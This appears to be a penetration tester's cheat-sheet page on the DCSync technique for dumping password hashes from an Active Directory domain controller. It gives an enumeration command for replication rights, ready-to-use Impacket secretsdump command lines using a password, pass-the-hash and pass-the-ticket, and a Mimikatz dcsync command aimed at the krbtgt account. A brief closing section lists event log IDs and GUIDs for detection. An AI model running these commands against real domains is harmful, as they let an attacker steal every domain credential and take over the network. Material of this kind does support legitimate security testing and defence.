# DCSync

**Dump Password Hashes from Domain Controller**

It is a credential dumping techniques, adversary to simulate the replication process of a Domain Controllers to ask other DC to replicate information using the MS-DRSR. It cannot disabled as MS-DRSR is a necessary servers of a AD. 

This attack requires domain admin privileges (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have this privileges by default.  

## Enumeration

```
Get-ObjectAcl -DistinguishedName "dc=dc1,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'ds-replication-get-changes') 
```

## Impacket: secretsdump 

```
# using a plaintext password
secretsdump.py -outputfile 'file.name' 'User'/'domain':'PASSWORD'@'Domain Controller IP'
secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

# with Pass-the-Hash
secretsdump.py -outputfile 'file.name' -hashes 'LMhash':'NThash' 'User'/'domain'@'Domain Controller IP'

# with Pass-the-Ticket
secretsdump.py -k -outputfile 'file.name' 'User'/'domain'@'Domain Controller IP'

```

### Example

{% embed url="<https://calvin-lai.gitbook.io/calvin-lai-security/exploit-cve-poc/zerologon-exploit#start-exploit>" %}
Secrets Dump
{% endembed %}

{% embed url="<https://calvin-lai.gitbook.io/calvin-lai-security/hack-the-box-writeup/windows-machine/sauna#h.2tnfkp5exzdk>" %}
Pass-the-Hash Attack
{% endembed %}

## Mimikatz

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dc01\krbtgt"'
```

<figure><img src="https://1020855008-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MHdTwldplFku-IlYazS%2Fuploads%2F6tksZ5TFnN64rMetnBxy%2Fimage.png?alt=media&#x26;token=6c02123f-2fd4-440c-87d1-b878ef2440ce" alt=""><figcaption></figcaption></figure>

## Detection

Monitor Windows Event Log 4662 to detect the String: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 or 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 or 89e95b76-444d-4c62-991a-0facbeda640c